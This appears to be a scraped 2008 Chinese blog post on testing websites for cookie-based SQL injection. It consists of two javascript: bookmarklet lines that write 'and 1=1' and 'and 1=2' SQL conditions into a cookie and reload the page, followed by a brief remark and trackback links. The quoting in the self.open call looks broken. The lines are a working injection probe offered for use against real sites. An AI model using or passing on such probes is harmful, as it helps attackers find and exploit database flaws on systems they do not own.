javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0);
javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0);
哎,还是在新窗口打开了,不过比网上流传的省了一步刷新和返回了。
http://www.cnyzy.cn/trackback.asp?tbID=717
http://www.cnyzy.cn/trackback.asp?tbID=717&CP=GBK
用户登陆
站点日历
站点统计
最新评论
日志搜索
判断cookies注入的js语句 [ 日期:2008-03-08 ] [ 来自: